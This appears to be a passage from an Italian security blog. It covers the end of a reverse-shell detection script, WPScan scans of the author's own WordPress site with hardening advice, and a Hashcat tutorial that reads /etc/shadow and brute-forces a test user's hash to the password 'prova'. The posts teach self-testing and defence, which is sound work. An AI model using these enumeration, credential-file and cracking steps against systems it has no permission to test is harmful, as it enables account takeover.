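    last_inbound_smb = {}  # (target_host, peer_host) -> time of last SMB contact
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["dport"] in SERVICE_PORTS:
            last_inbound_smb[(ev["dst"], ev["src"])] = ev["ts"]
            continue
        key = (ev["src"], ev["dst"])  # the former target now initiating to the peer
        seen = last_inbound_smb.get(key)
        if (seen is not None and ev["ts"] - seen <= window
                and ev["dport"] not in EXPECTED_EGRESS):
            hits.append((ev["src"], ev["dst"], ev["dport"], ev["ts"]))
    return hits


def detect(text=SAMPLE_LOG):
    """Convenience wrapper: parse and correlate in one call."""
    return find_reverse_shell_candidates(parse_log(text))


if __name__ == "__main__":
    for victim, attacker, port, ts in detect():
        print(f"{ts} possible reverse shell: {victim} -> {attacker}:{port}")
```

Only the 10.10.10.7 -> 10.10.10.5:4444 connection is flagged: the later DNS and HTTPS connections are on expected ports, and the 443 connection to 10.10.10.9 also falls outside the five-minute window.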

Partly adapted from the book: Penetration Testing – a hands-on introduction to Hacking by Georgia Weidman

Tags: ethical hacking, exploit, guide, Italian, Kali Linux, Metasploit, MS08-67, Nmap, Penetration testing, Penetration Testing - a hands-on Introduction to Hacking, IT security, vulnerabilities, windows

WordPress Security – Penetration test with Kali Linux

on 19 January 2019 at 18:01
Posted In: Ethical Hacking / Penetration Testing, Security / Anonymity, WordPress

A guide in Italian on how to test the security of your own site/server by running penetration tests with Kali Linux.

What is Kali Linux

Kali Linux is a Linux distribution for penetration testers and ethical hackers. Kali Linux, the successor of BackTrack Linux, is based on Debian and ships with all the tools needed for security testing and penetration tests preinstalled and preconfigured.

Clicking "Applications" at the top left opens a menu with all the tools for security testing in general (wireless network security, websites, passwords and so on); menu number 3, "Web Application Analysis", contains the best-known tools for testing the security of your own site/server, such as wpscan and owasp-zap.

[Image: Kali Linux - Web Application]

To download Kali Linux, click the following link: Kali Linux ISO Download.

Testing WordPress security with WPScan

WPScan is a tool used to detect vulnerabilities in WordPress sites and test their security. With WPScan you can find out which plugins are installed, so that they can be exploited if they are not up to date; you can discover the blog administrator's username and then try to crack the password with a brute-force attack; you can identify the WordPress theme and/or the WordPress version in use and then look for exploits; and much more.

Here is a simple example:

:~ # wpscan --url https://christeninformatica.ch
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

Scan Aborted: The remote website is up, but does not seem to be running WordPress.
:~ # 

When I tried to test my own site I got an error: "Scan Aborted: The remote website is up, but does not seem to be running WordPress". For various reasons a site may be running WordPress and still appear not to be. If you are sure (or to be on the safe side) that the site in question runs WordPress, use the --force option, which forces the scan to run without checking whether the site is WordPress.

# wpscan --force --url https://christeninformatica.ch
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: https://christeninformatica.ch/
[+] Started: Sat Jan 19 16:57:22 2019

Interesting Finding(s):

[+] https://christeninformatica.ch/
 | Interesting Entry: Server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] https://christeninformatica.ch/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.0.3 identified (Latest, released on 2019-01-09).
 | Detected By: Rss Generator (Aggressive Detection)
 |  - https://christeninformatica.ch/feed/, https://wordpress.org/?v=5.0.3
 |  - https://christeninformatica.ch/comments/feed/, https://wordpress.org/?v=5.0.3

[i] The main theme could not be detected.

[+] Enumerating All Plugins
[+] Checking Plugin Versions

[i] Plugin(s) Identified:

[+] wp-super-cache
 | Location: https://christeninformatica.ch/tag/plugins/wp-super-cache/
 | Latest Version: 1.6.4
 | Last Updated: 2018-12-20T09:36:00.000Z
 |
 | Detected By: Comment (Passive Detection)
 |
 | [!] 10 vulnerabilities identified:
 |
 | [!] Title: WP-Super-Cache 1.3 - Remote Code Execution
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6623
 |      - http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/
 |      - http://wordpress.org/support/topic/pwn3d
 |      - http://blog.sucuri.net/2013/04/update-wp-super-cache-and-w3tc-immediately-remote-code-execution-vulnerability-disclosed.html
 |
 | [!] Title: WP Super Cache 1.3 - trunk/wp-cache.php wp_nonce_url Function URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6624
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/wptouch.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6625
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/searchengine.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6626
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/domain-mapping.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6627
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/badbehaviour.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6628
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/awaitingmoderation.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6629
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache <= 1.4.2 - Stored Cross-Site Scripting (XSS)
 |     Fixed in: 1.4.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7889
 |      - http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html
 |
 | [!] Title: WP Super Cache <= 1.4.4 - Cross-Site Scripting (XSS)
 |     Fixed in: 1.4.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8197
 |      - http://z9.io/2015/09/25/wp-super-cache-1-4-5/
 |
 | [!] Title: WP Super Cache <= 1.4.4 - PHP Object Injection
 |     Fixed in: 1.4.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8198
 |      - http://z9.io/2015/09/25/wp-super-cache-1-4-5/
 |
 | The version could not be determined.

[+] Enumerating Config Backups
 Checking Config Backups - Time: 00:00:05 <==================================================================================================================================================================================================> (21 / 21) 100.00% Time: 00:00:05

[i] No Config Backups Found.

[+] Finished: Sat Jan 19 16:57:38 2019
[+] Requests Done: 50
[+] Cached Requests: 7
[+] Data Sent: 8.144 KB
[+] Data Received: 896.239 KB
[+] Memory used: 84.176 MB
[+] Elapsed time: 00:00:16
:~ #

As the result of this first "scan" shows, we have a serious problem: WPScan detected the WordPress version in use. To fix this I blocked access to "christeninformatica.ch/feed" and disabled the RSS feeds. If a new test run to verify the changes shows that WPScan is using other methods to determine the WordPress version, find out how to block those as well and test again.

Discovering the WordPress administrator name with WPScan

:~ # wpscan --force --url https://christeninformatica.ch --enumerate u
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: https://christeninformatica.ch/
[+] Started: Sat Jan 19 17:02:11 2019

Interesting Finding(s):

[+] https://christeninformatica.ch/
 | Interesting Entry: Server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] https://christeninformatica.ch/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.0.3 identified (Latest, released on 2019-01-09).
 | Detected By: Rss Generator (Aggressive Detection)
 |  - https://christeninformatica.ch/feed/, https://wordpress.org/?v=5.0.3
 |  - https://christeninformatica.ch/comments/feed/, https://wordpress.org/?v=5.0.3

[i] The main theme could not be detected.

[+] Enumerating Users
 Brute Forcing Author IDs - Time: 00:00:02 <=================================================================================================================================================================================================> (10 / 10) 100.00% Time: 00:00:02

[i] User(s) Identified:

[+] chituser
 | Detected By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By: Wp Json Api (Aggressive Detection)
 |  - https://christeninformatica.ch/wp-json/wp/v2/users/

[+] chitadmin
 | Detected By: Rss Generator (Aggressive Detection)

[+] Finished: Sat Jan 19 17:02:16 2019
[+] Requests Done: 18
[+] Cached Requests: 28
[+] Data Sent: 3.107 KB
[+] Data Received: 482.021 KB
[+] Memory used: 24.863 MB
[+] Elapsed time: 00:00:04
:~ #

The "--enumerate u" option (users) checks whether information such as the names of the administrator and of other users is protected or not. Here too WPScan found a problem: it discovered the name of the administrator and of another user. An attacker could now try to crack the password and obtain administrator rights on the WordPress site. To fix this, disable the WP JSON API and configure the WordPress theme in use so that it does not display the author.

Disabling the REST API in WordPress with iThemes Security

To disable the WP JSON API, go to the "WordPress Tweaks" section of iThemes Security and under REST API choose "Restricted Access".
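A way to verify the two disclosures WPScan reported above (the version in the RSS generator tag, user slugs via the REST API) after applying the hardening, written as an added Python example that is not part of the original post. The response bodies below are constructed samples; in practice you would fetch /feed/ and /wp-json/wp/v2/users/ yourself and pass the bodies in.

```python
import json
import re

# Constructed sample responses (not captured from the real site), modelled on
# the two WPScan findings above: the RSS <generator> tag and /wp-json/wp/v2/users/.
FEED_BEFORE = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel><title>Example blog</title>
<generator>https://wordpress.org/?v=5.0.3</generator>
<item><title>Hello</title><dc:creator>chitadmin</dc:creator></item>
</channel></rss>"""

FEED_AFTER = """<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"><channel><title>Example blog</title>
<item><title>Hello</title></item>
</channel></rss>"""

USERS_BEFORE = json.dumps([{"id": 1, "slug": "chituser", "name": "chituser"}])
# Constructed error body standing in for a "Restricted Access" response.
USERS_AFTER = json.dumps({"code": "rest_forbidden", "data": {"status": 401}})

GENERATOR_RE = re.compile(r"<generator>\s*https?://wordpress\.org/\?v=([0-9.]+)\s*</generator>")
CREATOR_RE = re.compile(r"<dc:creator>([^<]+)</dc:creator>")


def feed_disclosures(body: str) -> dict:
    """What an RSS feed body reveals: the WordPress version (WPScan's
    'Rss Generator' check) and any author names in <dc:creator>."""
    m = GENERATOR_RE.search(body)
    return {"version": m.group(1) if m else None,
            "authors": sorted(set(CREATOR_RE.findall(body)))}


def rest_user_disclosures(body: str) -> list:
    """User slugs exposed by /wp-json/wp/v2/users/ (WPScan's 'Wp Json Api'
    check). An error object or a non-JSON body means nothing was leaked."""
    try:
        data = json.loads(body)
    except json.JSONDecodeError:
        return []
    if not isinstance(data, list):
        return []
    return sorted(u["slug"] for u in data if isinstance(u, dict) and u.get("slug"))


def hardening_report(feed_body: str, users_body: str) -> dict:
    """Combine both checks into a pass/fail view of the hardening steps."""
    feed = feed_disclosures(feed_body)
    users = rest_user_disclosures(users_body)
    return {"version_leaked": feed["version"] is not None,
            "authors_leaked": bool(feed["authors"]),
            "users_leaked": bool(users),
            "details": {"version": feed["version"],
                        "feed_authors": feed["authors"], "rest_users": users}}


if __name__ == "__main__":
    print("before hardening:", hardening_report(FEED_BEFORE, USERS_BEFORE))
    print("after hardening: ", hardening_report(FEED_AFTER, USERS_AFTER))
```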

Kali Linux - Web Application

Discovering the WordPress plugins in use with WPScan

:~ # wpscan --force --url https://christeninformatica.ch --enumerate p
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: https://christeninformatica.ch/
[+] Started: Sat Jan 19 17:10:51 2019

Interesting Finding(s):

[+] https://christeninformatica.ch/
 | Interesting Entry: Server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] https://christeninformatica.ch/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.0.3 identified (Latest, released on 2019-01-09).
 | Detected By: Rss Generator (Aggressive Detection)
 |  - https://christeninformatica.ch/feed/, https://wordpress.org/?v=5.0.3
 |  - https://christeninformatica.ch/comments/feed/, https://wordpress.org/?v=5.0.3

[i] The main theme could not be detected.

[+] Enumerating Most Popular Plugins
[+] Checking Plugin Versions

[i] Plugin(s) Identified:

[+] wp-super-cache
 | Location: https://christeninformatica.ch/tag/plugins/wp-super-cache/
 | Latest Version: 1.6.4
 | Last Updated: 2018-12-20T09:36:00.000Z
 |
 | Detected By: Comment (Passive Detection)
 |
 | [!] 10 vulnerabilities identified:
 |
 | [!] Title: WP-Super-Cache 1.3 - Remote Code Execution
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6623
 |      - http://www.acunetix.com/blog/web-security-zone/wp-plugins-remote-code-execution/
 |      - http://wordpress.org/support/topic/pwn3d
 |      - http://blog.sucuri.net/2013/04/update-wp-super-cache-and-w3tc-immediately-remote-code-execution-vulnerability-disclosed.html
 |
 | [!] Title: WP Super Cache 1.3 - trunk/wp-cache.php wp_nonce_url Function URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6624
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/wptouch.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6625
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/searchengine.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6626
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/domain-mapping.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6627
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/badbehaviour.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6628
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache 1.3 - trunk/plugins/awaitingmoderation.php URI XSS
 |     Fixed in: 1.3.1
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/6629
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-2008
 |
 | [!] Title: WP Super Cache <= 1.4.2 - Stored Cross-Site Scripting (XSS)
 |     Fixed in: 1.4.3
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/7889
 |      - http://blog.sucuri.net/2015/04/security-advisory-persistent-xss-in-wp-super-cache.html
 |
 | [!] Title: WP Super Cache <= 1.4.4 - Cross-Site Scripting (XSS)
 |     Fixed in: 1.4.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8197
 |      - http://z9.io/2015/09/25/wp-super-cache-1-4-5/
 |
 | [!] Title: WP Super Cache <= 1.4.4 - PHP Object Injection
 |     Fixed in: 1.4.5
 |     References:
 |      - https://wpvulndb.com/vulnerabilities/8198
 |      - http://z9.io/2015/09/25/wp-super-cache-1-4-5/
 |
 | The version could not be determined.

[+] Finished: Sat Jan 19 17:11:02 2019
[+] Requests Done: 28
[+] Cached Requests: 6
[+] Data Sent: 4.73 KB
[+] Data Received: 679.634 KB
[+] Memory used: 67.156 MB
[+] Elapsed time: 00:00:10
:~ #

"--enumerate p" is used to see the installed plugins. The solution is to hide the traces of the plugins from the HTML code, rename the wp-content folder, use as few plugins as possible and update them regularly.

Discovering the WordPress theme in use with WPScan

# wpscan --force --url https://christeninformatica.ch --enumerate t
_______________________________________________________________
        __          _______   _____
        \ \        / /  __ \ / ____|
         \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
          \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
           \  /\  /  | |     ____) | (__| (_| | | | |
            \/  \/   |_|    |_____/ \___|\__,_|_| |_|

        WordPress Security Scanner by the WPScan Team
                       Version 3.4.3
          Sponsored by Sucuri - https://sucuri.net
      @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
_______________________________________________________________

[+] URL: https://christeninformatica.ch/
[+] Started: Sat Jan 19 17:26:06 2019

Interesting Finding(s):

[+] https://christeninformatica.ch/
 | Interesting Entry: Server: Apache
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] https://christeninformatica.ch/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] WordPress version 5.0.3 identified (Latest, released on 2019-01-09).
 | Detected By: Rss Generator (Aggressive Detection)
 |  - https://christeninformatica.ch/feed/, https://wordpress.org/?v=5.0.3
 |  - https://christeninformatica.ch/comments/feed/, https://wordpress.org/?v=5.0.3

[i] The main theme could not be detected.

[+] Enumerating Most Popular Themes
 Checking Known Locations - Time: 00:01:31 <===============================================================================================================================================================================================> (411 / 411) 100.00% Time: 00:01:31

[i] No themes Found.

[+] Finished: Sat Jan 19 17:27:45 2019
[+] Requests Done: 438
[+] Cached Requests: 4
[+] Data Sent: 70.294 KB
[+] Data Received: 4.764 MB
[+] Memory used: 47.598 MB
[+] Elapsed time: 00:01:39
:~ # 

This example shows the importance of not using overly popular themes and, if you do use them, of updating them as often as possible.

Testing the security of your site/server with OWASP ZAP

OWASP ZAP is a program for testing the security of your server/site. It is simple to use: just enter the URL of your page in the "URL to attack" field and click Attack.

Once it has finished, check under "Alerts" to see which security flaws were found, research how to fix the problems and then remediate them.

OWASP ZAP - WordPress security penetration testing

└ Tags: ethical hacking, guida, italiano, Kali Linux, linux, OWASP ZAP, penetration test, security, server, Sicurezza, sito, tutorial, Wordpress, wpscan

Cracking passwords with Hashcat Brute Force

Jan16
on 16 January 2019 at 18:31
Posted In: Ethical Hacking / Penetration Testing, Sicurezza / Anonimato

A guide in Italian on how to "crack" passwords with Hashcat using a brute-force attack. Hashcat is a very sophisticated tool used to recover passwords from hashes. It is the fastest password cracker around, partly because it uses the graphics card's GPU to speed up the process. With Hashcat you can "crack" any password, WordPress passwords included for example: just obtain the hash file and then "crack" it comfortably offline.

Obviously tools like this can be used legitimately, to test password strength or to recover a password, or otherwise.

Identifying a hashing algorithm

To "crack" a hash file you first need to know which hashing algorithm was used. This is easy to tell: just look at the first two characters of the string, see the table below.

  Symbol | Hashing algorithm
 ========+===================
  $0     | DES
  $1     | MD5 Hashing
  $2     | Blowfish
  $2A    | Eksblowfish
  $5     | SHA256
  $6     | SHA512

If the string starts with $6, the algorithm used is SHA512. There are also programs, hashid for example, that can help identify the type of hashing algorithm.

Run the command "hashcat --help" and look under "Hash modes": there is a list of identification numbers to use. In our example, cracking Linux system passwords with Hashcat, the number to use is 1800.

  15900 | DPAPI masterkey file v2                          | Operating Systems
  12800 | MS-AzureSync  PBKDF2-HMAC-SHA256                 | Operating Systems
   1500 | descrypt, DES (Unix), Traditional DES            | Operating Systems
  12400 | BSDi Crypt, Extended DES                         | Operating Systems
    500 | md5crypt, MD5 (Unix), Cisco-IOS $1$ (MD5)        | Operating Systems
   3200 | bcrypt $2*$, Blowfish (Unix)                     | Operating Systems
   7400 | sha256crypt $5$, SHA256 (Unix)                   | Operating Systems
   1800 | sha512crypt $6$, SHA512 (Unix)                   | Operating Systems
    122 | macOS v10.4, MacOS v10.5, MacOS v10.6            | Operating Systems
   1722 | macOS v10.7                                      | Operating Systems
   7100 | macOS v10.8+ (PBKDF2-SHA512)                     | Operating Systems
   6300 | AIX {smd5}                                       | Operating Systems
   6700 | AIX {ssha1}                                      | Operating Systems
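To turn the two tables above into a check, here is an added Python example (not from the original post) that reads a /etc/shadow entry, identifies the algorithm from its "$N$" prefix and returns the matching hashcat mode number. The testuser line is the one from this post; the other entries are constructed placeholders, not real hashes.

```python
# Mapping from the crypt(3) "$N$" prefix to the hashcat hash mode, built from
# the two tables above (symbol -> algorithm, and the `hashcat --help` mode list).
CRYPT_MODES = {
    "1": ("md5crypt, MD5 (Unix)", 500),
    "2": ("bcrypt $2*$, Blowfish (Unix)", 3200),   # $2$, $2a$, $2b$, $2y$
    "5": ("sha256crypt $5$, SHA256 (Unix)", 7400),
    "6": ("sha512crypt $6$, SHA512 (Unix)", 1800),
}


def identify_crypt_hash(hash_field: str):
    """Return (algorithm, hashcat_mode) for one /etc/shadow password field,
    or None when the account is locked or has no password set."""
    if hash_field in ("", "*") or hash_field.startswith("!"):
        return None
    if hash_field.startswith("$"):
        # "$6$salt$hash" splits into ["", "6", "salt", "hash"]
        parts = hash_field.split("$")
        if len(parts) < 4 or not parts[1]:
            return ("malformed", None)
        # bcrypt variants ($2a$, $2y$, ...) all share the leading "2"
        key = parts[1][0] if parts[1][0] == "2" else parts[1]
        return CRYPT_MODES.get(key, ("unknown", None))
    if len(hash_field) == 13:
        # traditional DES crypt has no prefix and is always 13 characters
        return ("descrypt, DES (Unix)", 1500)
    return ("unknown", None)


def parse_shadow_line(line: str) -> dict:
    """Split a shadow entry into user, hash field and the matching hashcat mode."""
    fields = line.rstrip("\n").split(":")
    if len(fields) < 9:
        raise ValueError("not a shadow entry: %r" % line)
    user, hash_field = fields[0], fields[1]
    ident = identify_crypt_hash(hash_field)
    return {"user": user, "hash": hash_field,
            "algorithm": ident[0] if ident else None,
            "mode": ident[1] if ident else None}


# The testuser line from this post, plus constructed entries for other prefixes
# (the $1$ and $2y$ values are placeholders, not real hashes).
SAMPLE_SHADOW = [
    "testuser:$6$3jszVVeWR0jP6Bpr$eVtWKvj3KjQXUvIpz286QNRl1bs5EAcq6gBG.z.TvbJVjYetM0byqyb7rwFKQwkYnIag80QF4HqUBreIhY0Mz1:17911:0:99999:7:::",
    "legacy:$1$saltsalt$constructedmd5crypthashXXXXXX:17911:0:99999:7:::",
    "bcryptuser:$2y$10$constructedbcryptsaltandhashvalue000000000000000000000:17911:0:99999:7:::",
    "locked:!:17911:0:99999:7:::",
]

if __name__ == "__main__":
    for line in SAMPLE_SHADOW:
        print(parse_shadow_line(line))
```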

Hashcat attack modes

  Number | Attack mode description
 ========+=========================
  0      | Dictionary attack
  1      | Combination
  3      | Brute-force attack
  6      | Hybrid attack

Character sets and mask

Character sets for Hashcat

The character set to use includes lowercase letters, uppercase letters, digits and symbols. See the table below:

  ? | Charset
 ===+=========
  l | abcdefghijklmnopqrstuvwxyz
  u | ABCDEFGHIJKLMNOPQRSTUVWXYZ
  d | 0123456789
  s |  !"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
  a | ?l?u?d?s
  b | 0x00 - 0xff

So to "crack" a password suspected to consist only of lowercase letters use ?l, for uppercase letters ?u, for digits ?d, and so on. To "crack" a password made of lowercase letters, uppercase letters and digits use for example "-1 ?l?u?d ?1?1?1?1". To use every possible character, use ?a.

Hashcat mask

The mask defines the number of characters of the password to "crack" as well as the type of characters to use.

An example mask for a password made of 4 lowercase letters could be this: ?l?l?l?l.

Cracking Linux system passwords with Hashcat

In this example of how to "crack" Linux system passwords with Hashcat, the first thing I do is create a test user.
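To see what a mask costs before running it, here is an added Python example (not from the original post) that computes a mask's keyspace from the charset table above, including custom charsets defined with -1 to -4, and the worst-case time at a given rate. For ?l?l?l?l?l it returns 11881376, the denominator hashcat prints in the Progress line of the run further down; the 7444 H/s rate is the Speed.Dev value from that same run.

```python
import string

# hashcat's built-in charsets, from the table above (?b is all 256 byte values).
BUILTIN = {
    "l": set(string.ascii_lowercase),
    "u": set(string.ascii_uppercase),
    "d": set(string.digits),
    "s": set(" !\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~"),
    "b": set(map(chr, range(256))),
}
BUILTIN["a"] = BUILTIN["l"] | BUILTIN["u"] | BUILTIN["d"] | BUILTIN["s"]


def expand_charset(spec: str) -> set:
    """Expand a custom charset definition such as '?l?u?d' or 'abc?d'
    (built-in references plus literal characters) into a set of characters."""
    chars, i = set(), 0
    while i < len(spec):
        if spec[i] == "?" and i + 1 < len(spec):
            key = spec[i + 1]
            chars |= {"?"} if key == "?" else BUILTIN[key]   # "??" is a literal "?"
            i += 2
        else:
            chars.add(spec[i])
            i += 1
    return chars


def mask_keyspace(mask: str, custom: dict = None) -> int:
    """Number of candidates a mask covers. `custom` maps '1'..'4' to the
    definitions given with -1 .. -4, so "-1 ?l?u?d ?1?1?1?1" becomes
    mask_keyspace("?1?1?1?1", {"1": "?l?u?d"})."""
    sizes = {k: len(expand_charset(v)) for k, v in (custom or {}).items()}
    total, i = 1, 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            key = mask[i + 1]
            if key == "?":
                size = 1                     # literal "?" fixes the position
            elif key in sizes:
                size = sizes[key]
            else:
                size = len(BUILTIN[key])     # KeyError for an undefined charset
            i += 2
        else:
            size = 1                         # a literal character fixes the position
            i += 1
        total *= size
    return total


def worst_case_seconds(mask: str, hashes_per_second: float, custom: dict = None) -> float:
    """Time to exhaust the whole mask at the rate hashcat reports as Speed.Dev."""
    return mask_keyspace(mask, custom) / hashes_per_second


def fmt(seconds: float) -> str:
    m, s = divmod(int(seconds), 60)
    h, m = divmod(m, 60)
    d, h = divmod(h, 24)
    return "%dd %02dh %02dm %02ds" % (d, h, m, s)


if __name__ == "__main__":
    rate = 7444.0   # sha512crypt H/s on the GTX 460 in the run further down
    for mask, custom in [("?l?l?l?l?l", None), ("?1?1?1?1", {"1": "?l?u?d"}),
                         ("?a?a?a?a?a?a?a?a", None)]:
        print(mask, mask_keyspace(mask, custom), fmt(worst_case_seconds(mask, rate, custom)))
```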

:~ # useradd testuser
:~ # passwd testuser
Nuova password: 
PASSWORD ERRATA: è troppo corta
PASSWORD ERRATA: è troppo semplice
Reimmettere la nuova password: 
passwd: password aggiornata correttamente
:~ #

The next step is to create a "hash file". On Linux systems passwords are stored in hashed form in the file /etc/shadow; modern systems use the SHA512 hashing algorithm.

Now, to create the file we need, we extract this information, the password hash, from /etc/shadow with the following command:

:~ # tail -n1 /etc/shadow 
testuser:$6$3jszVVeWR0jP6Bpr$eVtWKvj3KjQXUvIpz286QNRl1bs5EAcq6gBG.z.TvbJVjYetM0byqyb7rwFKQwkYnIag80QF4HqUBreIhY0Mz1:17911:0:99999:7:::
:~ # tail -n1 /etc/shadow > testuser.hash

Once the "hash file" has been created we can proceed. To crack the password contained in the file, run the following command:

:~ # hashcat -m 1800 -a 3 testuser.hash ?l?l?l?l?l
hashcat (v3.00) starting...

OpenCL Platform #1: NVIDIA Corporation  
======================================
- Device #1: GeForce GTX 460, 240/963 MB allocatable, 7MCU

Hashes: 1 hashes; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Applicable Optimizers:
* Zero-Byte
* Single-Hash
* Single-Salt
* Brute-Force
* Uses-64-Bit
Watchdog: Temperature abort trigger set to 90c
Watchdog: Temperature retain trigger set to 75c

[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => s

Session.Name...: hashcat
Status.........: Running
Input.Mode.....: Mask (?l?l?l?l?l) [5]
Hash.Target....: $6$3jszVVeWR0jP6Bpr$eVtWKvj3KjQXUvIpz286Q...
Hash.Type......: sha512crypt, SHA512(Unix)
Time.Started...: Tue Jan 15 21:02:08 2019 (29 secs)
Time.Estimated.: Tue Jan 15 21:28:50 2019 (26 mins, 7 secs)
Speed.Dev.#1...:     7444 H/s (11.61ms)
Recovered......: 0/1 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.......: 215040/11881376 (1.81%)
Rejected.......: 0/215040 (0.00%)
Restore.Point..: 0/456976 (0.00%)
HWMon.Dev.#1...: Temp: 60c Fan: 39%

$6$3jszVVeWR0jP6Bpr$eVtWKvj3KjQXUvIpz286QNRl1bs5EAcq6gBG.z.TvbJVjYetM0byqyb7rwFKQwkYnIag80QF4HqUBreIhY0Mz1:prova
                                                          
